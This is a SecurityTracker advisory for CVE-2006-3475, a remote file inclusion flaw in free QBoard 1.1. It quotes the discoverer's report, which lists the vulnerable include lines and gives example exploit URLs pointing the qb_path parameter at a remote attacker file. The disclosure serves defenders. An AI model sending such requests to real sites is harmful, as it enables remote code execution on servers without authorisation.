free QBoard 'qb_path' Include File Bug Lets Remote Users Execute Arbitrary Code
|
|
SecurityTracker Alert ID: 1016433
|
|
SecurityTracker URL: http://securitytracker.com/id?1016433
|
|
CVE Reference: CVE-2006-3475
(Links to External Site)
|
Updated: Aug 12 2008
|
Original Entry Date: Jul 4 2006
|
Impact: Execution of arbitrary code via network, User access via network
|
Exploit Included: Yes
|
Version(s): 1.1
|
Description: A vulnerability was reported in free QBoard. A remote user can include and execute arbitrary code on the target system.
The software does not properly validate user-supplied input in the 'qb_path' parameter. A remote user can supply a specially crafted
URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating
system commands, will run with the privileges of the target web service.
The following scripts are affected:
index.php
about.php
contact.php
delete.php
faq.php
features.php
history.php
CrAsh_oVeR_rIdE of Arabian Security Team discovered this vulnerability.
|
Impact: A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: sourceforge.net/projects/freeqboard/ (Links to External Site)
|
Cause: Input validation error, State error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: KARKOR23@hotmail.com
|
Message History:
None.
|
Source Message Contents
|
Date: Sun, 02 Jul 2006 10:49:34 +0000
From: KARKOR23@hotmail.com
Subject: free QBoard v1.1 Multiple Remote File include
|
free QBoard v1.1 Multiple Remote File include
-------------------------------------------------
Discovered By CrAsh_oVeR_rIdE
Arabian Security Team
-------------------------------------------------
site of script:http://sourceforge.net/projects/freeqboard/
-------------------------------------------------
Vulnerable: free QBoard v1.1
-------------------------------------------------
vulnerable code:
----------------------
1- in index.php
include $qb_path."incs/mysql.php";
include $qb_path."incs/crypt.php";
----------------------------------
2- in about.php
include $qb_path."incs/header.php";
----------------------------------
3- in contact.php
include $qb_path."incs/header.php";
----------------------------------
4- in delete.php
include $qb_path."incs/mysql.php";
include $qb_path."incs/crypt.php";
----------------------------------
5- in faq.php
include $qb_path."incs/header.php";
----------------------------------
6- in features.php
include $qb_path."incs/header.php";
----------------------------------
7- in history.php
include $qb_path."incs/mysql.php";
include $qb_path."incs/crypt.php";
----------
$qb_path parameter File inclusion
-----------------------------------------------------------------------------------------------------
------------------------------------
vulnerable files :
--------------------
index.php
about.php
contact.php
delete.php
faq.php
features.php
history.php
-------------------------------------------------
example:
www.example.com/(path)/index.php?qb_path=http://evilcode.txt?
www.example.com/(path)/about.php?qb_path=http://evilcode.txt?
www.example.com/(path)/contact.php?qb_path=http://evilcode.txt?
www.example.com/(path)/delete.php?qb_path=http://evilcode.txt?
www.example.com/(path)/faq.php?qb_path=http://evilcode.txt?
www.example.com/(path)/features.php?qb_path=http://evilcode.txt?
www.example.com/(path)/history.php?qb_path=http://evilcode.txt?
-------------------------------------------------
Discovered By CrAsh_oVeR_rIdE
E-mail:KARKOR23@hotmail.com
Site:www.lezr.com
Greetz:KING-HACKER,YOUNG HACKER,SIMO64,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,Black-Code,ALMOKAN
3, mr-hcr AND ALL LEZR.COM Member
|
|
